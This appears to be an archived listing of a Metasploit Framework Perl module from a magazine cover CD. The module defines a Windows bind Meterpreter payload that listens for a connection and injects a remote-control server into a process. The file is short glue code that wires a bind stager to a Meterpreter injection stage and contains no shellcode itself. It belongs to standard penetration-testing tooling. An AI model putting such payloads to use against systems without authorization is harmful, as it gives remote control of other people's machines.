home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / usr / lib / metasploit / payloads / win32_bind_meterpreter.pm < prev    next >
Text File  |  2006-06-30  |  1KB  |  44 lines

  1.  
  2. ##
  3. # This file is part of the Metasploit Framework and may be redistributed
  4. # according to the licenses defined in the Authors field below. In the
  5. # case of an unknown or missing license, this file defaults to the same
  6. # license as the core Framework (dual GPLv2 and Artistic). The latest
  7. # version of the Framework can always be obtained from metasploit.com.
  8. ##
  9.  
  10. package Msf::Payload::win32_bind_meterpreter;
  11. use strict;
  12. use base 'Msf::PayloadComponent::Windows::ia32::InjectMeterpreterStage';
  13. use FindBin qw{$RealBin};
  14.  
  15. my $info =
  16. {
  17.     'Name'         => 'Windows Bind Meterpreter DLL Inject',
  18.     'Version'      => '$Revision: 1.6 $',
  19.     'Description'  => 'Listen for connection and inject the meterpreter server into the remote process',
  20. };
  21.  
  22. sub _Load 
  23. {
  24.     Msf::PayloadComponent::Windows::ia32::InjectMeterpreterStage->_Import('Msf::PayloadComponent::Windows::ia32::BindStager');
  25.  
  26.     __PACKAGE__->SUPER::_Load();
  27. }
  28.  
  29. sub new 
  30. {
  31.     my $class = shift;
  32.     my $hash = @_ ? shift : { };
  33.     my $self;
  34.  
  35.     _Load();
  36.  
  37.     $hash = $class->MergeHashRec($hash, {'Info' => $info});
  38.     $self = $class->SUPER::new($hash, @_);
  39.  
  40.     return($self);
  41. }
  42.  
  43. 1;
  44.